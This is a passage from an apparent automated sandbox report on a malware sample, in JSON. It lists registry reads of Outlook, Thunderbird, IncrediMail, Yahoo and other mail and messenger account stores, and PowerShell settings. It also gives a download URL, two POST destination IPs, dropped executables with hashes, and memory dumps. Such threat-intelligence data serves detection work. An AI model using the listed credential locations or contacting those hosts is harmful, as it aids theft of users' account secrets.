"HKEY_CLASSES_ROOT\\TypeLib\\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\\2.8", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\\2.8\\0", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\\2.8\\0\\win64", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\\2.8\\0\\win64\\win64", "type": "registry_artifact", "version": 1 }, { "operations": [ "read" ], "reg_key_name": "HKEY_CLASSES_ROOT\\Licenses\\8804558B-B773-11d1-BC3E-0000F87552E7", "type": "registry_artifact", "version": 1 }, { "operations": [ "read", "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\VBA\\7.1\\Common", "type": "registry_artifact", "version": 1 }, { "operations": [ "read" ], "reg_key_name": "HKEY_CLASSES_ROOT\\TypeLib\\{00020905-0000-0000-C000-000000000046}\\8.7\\0\\win64", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Command Processor", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\PowerShell\\1", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager\\Environment", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Environment", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Application", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Application\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\HardwareEvents", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\HardwareEvents\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Internet Explorer", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Internet Explorer\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Key Management Service", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Key Management Service\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Media Center", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Media Center\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\OAlerts", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\OAlerts\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Security", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\System", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\System\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Windows PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Windows PowerShell\\PowerShell", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", "type": "registry_artifact", "version": 1 }, { "operations": [ "read", "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Clients\\Mail\\Microsoft Outlook", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "Mozilla Firefox\\bin", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "Mozilla Firefox 25.0\\bin", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Qualcomm\\Eudora\\CommandLine", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Classes\\Software\\Qualcomm\\Eudora\\CommandLine\\current", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Mozilla\\Mozilla Thunderbird", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Google\\Google Talk\\Accounts", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Google\\Google Desktop\\Mailboxes", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Account Manager\\Accounts", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Identities", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\Software\\Microsoft\\Internet Account Manager\\Accounts", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\189cba75c69c634996739bac92103ebb", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\1a8bd43e654f65418fbafadeef063a57", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\1cfb96c6c96b454ebff73da2e9f63f51", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\467888fc50a6c6448d6cc0cf7b5307d6", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\48dea081c9634a43a6861907855add5c", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\55aad8d134512d438564aa678cb92d66", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\71b0295bef58e344911262b243f005ac", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002", "type": "registry_artifact", "version": 1 }, { "operations": [ "access", "read" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\IncrediMail\\Identities", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\IncrediMail\\Identities", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_LOCAL_MACHINE\\Software\\Group Mail", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\MSNMessenger", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\MessengerService", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Yahoo\\Pager", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\IdentityCRL", "type": "registry_artifact", "version": 1 }, { "operations": [ "access" ], "reg_key_name": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows Live Mail", "type": "registry_artifact", "version": 1 } ], "type": "artifacts", "urls": [ { "operations": "GET", "type": "url_artifact", "url": "www.indpts.com/UHSD/", "version": 1 }, { "operations": "POST", "type": "url_artifact", "url": "173.201.20.6", "version": 1 }, { "operations": "POST", "type": "url_artifact", "url": "159.203.94.198", "version": 1 } ], "version": 1 }, "extracted_files": [ { "archive_path": "extracted_files/a7fc89d6b45ce712c0be6600be4a8e6de9de434d", "file_type": "created_file", "id": "file_2", "md5_hash": "ca6f2ee0e3b7218da76d126d22f707be", "norm_filename": "c:\\users\\public\\3292.exe", "sha1_hash": "a7fc89d6b45ce712c0be6600be4a8e6de9de434d", "sha256_hash": "b4e2b553642c3772769b83c5be8623f22f90323e626d9c8945585368445af8a4", "size": 122880, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/a7fc89d6b45ce712c0be6600be4a8e6de9de434d", "file_type": "created_file", "id": "file_3", "md5_hash": "ca6f2ee0e3b7218da76d126d22f707be", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\systeminfo.exe", "sha1_hash": "a7fc89d6b45ce712c0be6600be4a8e6de9de434d", "sha256_hash": "b4e2b553642c3772769b83c5be8623f22f90323e626d9c8945585368445af8a4", "size": 122880, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_4", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\programdata\\fb6f.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_5", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\programdata\\fb2f.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/da39a3ee5e6b4b0d3255bfef95601890afd80709", "file_type": "created_file", "id": "file_6", "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "norm_filename": "c:\\programdata\\fb70.tmp", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/9a3fb26927a7aa81255cf8abcc1f1c3e38f28c4f", "file_type": "created_file", "id": "file_7", "md5_hash": "36427ecb2a0faf13af3047c51b29f9c5", "norm_filename": "c:\\programdata\\fb70.tmp", "sha1_hash": "9a3fb26927a7aa81255cf8abcc1f1c3e38f28c4f", "sha256_hash": "ea156f649bb1180b32c6d5be76c0969941ec76d1fface734f401b5327ac57345", "size": 112, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/e95885d85bd47cc19e1181b046995ccd975fd59d", "file_type": "created_file", "id": "file_8", "md5_hash": "0b5111a9cc6baab51851f1702403b937", "norm_filename": "c:\\programdata\\fb2f.tmp", "sha1_hash": "e95885d85bd47cc19e1181b046995ccd975fd59d", "sha256_hash": "62a0536a5b9d1e3cb2af52a5630c330cd30da7398bcddf4a17af0913fc502819", "size": 87, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/6109040bf1ee76ce83597326228dd6ac1668f104", "file_type": "modified_file", "id": "file_9", "md5_hash": "f3393556a7ada08dd53548e19467e11f", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat", "sha1_hash": "6109040bf1ee76ce83597326228dd6ac1668f104", "sha256_hash": "f066cb2b19cc806d84ebeb3649da5050070a6e608156c217a5f8d1149ff8dee4", "size": 49152, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/ba8e1f4ec8f6aa576cf4f9b2a48587bec03b9582", "file_type": "modified_file", "id": "file_10", "md5_hash": "50d06047bd7adf336c6a8dd390506ff3", "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat", "sha1_hash": "ba8e1f4ec8f6aa576cf4f9b2a48587bec03b9582", "sha256_hash": "c657149342b5c59c25e0b42daeade7362989c99571979f788342e6bae0c8048e", "size": 32768, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/121b97b6c22d60d1dedc8d0160c86e8b9afa5089", "file_type": "modified_file", "id": "file_11", "md5_hash": "009e3e410a28a8e518f2c6ac83306724", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat", "sha1_hash": "121b97b6c22d60d1dedc8d0160c86e8b9afa5089", "sha256_hash": "960f4e97d46b9ddaece01a9def1d6fe466103fa57203483b13c8eb8c26a7b6bc", "size": 65536, "type": "extracted_file", "version": 1 } ], "process_dumps": [ { "archive_path": "process_dumps/process_00000001-region_00000437-addr_0x0000000004150000-size_0x000000000001f000-perm_rw.bin", "filename": "process_00000001-region_00000437-addr_0x0000000004150000-size_0x000000000001f000-perm_rw.bin", "id": "proc_dump_12", "md5_hash": "1ba3a2363cafeb58dc8ef1c3876b03eb", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0c14196fd38f45424759c83ed982a096f69be2d9", "sha256_hash": "56b9e24f2d285d7138757db5c97562436fc32a11b04a8d3bb33c4199037a8e23", "size": 126976, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000439-addr_0x0000000004350000-size_0x000000000001f000-perm_rw.bin", "filename": "process_00000001-region_00000439-addr_0x0000000004350000-size_0x000000000001f000-perm_rw.bin", "id": "proc_dump_13", "md5_hash": "0faf407f10b760231403fba19bc1f488", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "7d90effe9859f3177b5d963f94289c4b12656cb8", "sha256_hash": "c619012054ecaba17e178ede0c6b53963bfd4044bb0eaddd1338e5532bec8b34", "size": 126976, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000443-addr_0x00000000027f0000-size_0x0000000000003000-perm_rw.bin", "filename": "process_00000001-region_00000443-addr_0x00000000027f0000-size_0x0000000000003000-perm_rw.bin", "id": "proc_dump_14", "md5_hash": "ede07dd6c566efc89b042042cee9c0d1", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "9d3a1c9d4fef93981a06329f0fc247ab73b16ef5", "sha256_hash": "cbce450d3f991494e686e6c9106c4097a634eec7127d6d0345c91dfbf087d3c6", "size": 12288, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000445-addr_0x00000000030c0000-size_0x000000000001f000-perm_rw.bin", "filename": "process_00000001-region_00000445-addr_0x00000000030c0000-size_0x000000000001f000-perm_rw.bin", "id": "proc_dump_15", "md5_hash": "fc83452866710953a27bffefcd803c51", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "1c31e6cf36cfe3181026c45ec6b5aad42f9585f4", "sha256_hash": "79936f4605ee9d336288a5cf3d682855e08dabb12be6c0c145824d0529356486", "size": 126976, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000455-addr_0x0000000004580000-size_0x000000000001f000-perm_rw.bin", "filename": "process_00000001-region_00000455-addr_0x0000000004580000-size_0x000000000001f000-perm_rw.bin", "id": "proc_dump_16", "md5_hash": "5a42e2e50a62c952a651323f6c4572f3", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "fbc5b4aacf7529f9c688c853ec224cf4053f8ea8", "sha256_hash": "9469966e7c0ed613c7944a200876f995fb2e9a10919f53768cb4940a7945e71b", "size": 126976, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000460-addr_0x00000000027a0000-size_0x000000000000f000-perm_rw.bin", "filename": "process_00000001-region_00000460-addr_0x00000000027a0000-size_0x000000000000f000-perm_rw.bin", "id": "proc_dump_17", "md5_hash": "bc3f7506d334cfe22af8cbb0f8605508", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "ec4c72ad5076ed3ff77b87297af9b6cd8c9419b9", "sha256_hash": "6f56675173597ad24ad7a8ef69f00ee420b602bc30b3037515c3c386c917fd4f", "size": 61440, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000462-addr_0x0000000004100000-size_0x000000000001e000-perm_rw.bin", "filename": "process_00000001-region_00000462-addr_0x0000000004100000-size_0x000000000001e000-perm_rw.bin", "id": "proc_dump_18", "md5_hash": "be0c4c5be3652cb28a824d8530105d76", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "0fd48624d14089ac8720b24ab8409d440d387e65", "sha256_hash": "721f5d9ba4a0b08c37497eb8a5eb3007ca3df3f483638333ca6ede9edd710cba", "size": 122880, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000463-addr_0x0000000004120000-size_0x000000000001f000-perm_rw.bin", "filename": "process_00000001-region_00000463-addr_0x0000000004120000-size_0x000000000001f000-perm_rw.bin", "id": "proc_dump_19", "md5_hash": "6456e83f2e123493c7722f3fa4835489", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "bba67a294fd375f39ba1a4806dae660e65847028", "sha256_hash": "8f0c0ac34c3a304103c13e775390082989a573de703ae188fcce8420e4c571a7", "size": 126976, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000464-addr_0x0000000004180000-size_0x000000000001f000-perm_rw.bin", "filename": "process_00000001-region_00000464-addr_0x0000000004180000-size_0x000000000001f000-perm_rw.bin", "id": "proc_dump_20", "md5_hash": "c362fc9e52bb18bda34293b1016c99cb", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "da31171d6db206fc50c6b8880e60c67a621fb9a3", "sha256_hash": "dfe446a947ed3c58cb34779a8a13b6883da163d0c7e620be97b68cf353a49cd2", "size": 126976, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000467-addr_0x0000000004ee0000-size_0x0000000000021000-perm_rw.bin", "filename": "process_00000001-region_00000467-addr_0x0000000004ee0000-size_0x0000000000021000-perm_rw.bin", "id": "proc_dump_21", "md5_hash": "9bb0b801fdb1c7c2078c9ddbf0b32866", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "99f5466927201e61d10d796b13e18efe6910b649", "sha256_hash": "4d89b9e2c8d4b2057b82f52bc197b0af67bf7ce032e3c532f37392fe1e0d4f1c", "size": 135168, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000468-addr_0x0000000004f10000-size_0x000000000001f000-perm_rw.bin", "filename": "process_00000001-region_00000468-addr_0x0000000004f10000-size_0x000000000001f000-perm_rw.bin", "id": "proc_dump_22", "md5_hash": "93f59881cee3fd155c7921639a5aa31c", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "ad5db018f8feade359d37ca05179210048ccc6ee", "sha256_hash": "b00c05e78171fb2d459af82545d031c34ae92a13a8fed3dc6fe27d3e572e381a", "size": 126976, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000469-addr_0x0000000004fc0000-size_0x000000000001e000-perm_rw.bin", "filename": "process_00000001-region_00000469-addr_0x0000000004fc0000-size_0x000000000001e000-perm_rw.bin", "id": "proc_dump_23", "md5_hash": "01f89f39bd7bc9836324f63b3b7cb828", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "a57bee8d3405bef90159d12a052b0bfc2e2d1bd5", "sha256_hash": "1ef057ea5a4217130918b599dab0ee9762b3a75df3162bfc766b18297dc550b4", "size": 122880, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000470-addr_0x0000000005110000-size_0x000000000001f000-perm_rw.bin", "filename": "process_00000001-region_00000470-addr_0x0000000005110000-size_0x000000000001f000-perm_rw.bin", "id": "proc_dump_24", "md5_hash": "0ce6d6ff5a64a90bbcf29fa4be734941", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "d0d05c223d556588301a253216b18367e00e2541", "sha256_hash": "914287a4fe545031b2514dd77c076c03262024411ab52054a68e0a91a35999fc", "size": 126976, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000001-region_00000486-addr_0x000000000a4b0000-size_0x00000000004b2000-perm_rw.bin", "filename": "process_00000001-region_00000486-addr_0x000000000a4b0000-size_0x00000000004b2000-perm_rw.bin", "id": "proc_dump_25", "md5_hash": "3b3175419eb10af98de05aa69afffed1", "ref_process": { "ref_id": "proc_1", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "d784c34fa9b31d03a26b5d95de576f5bedb74ae6", "sha256_hash": 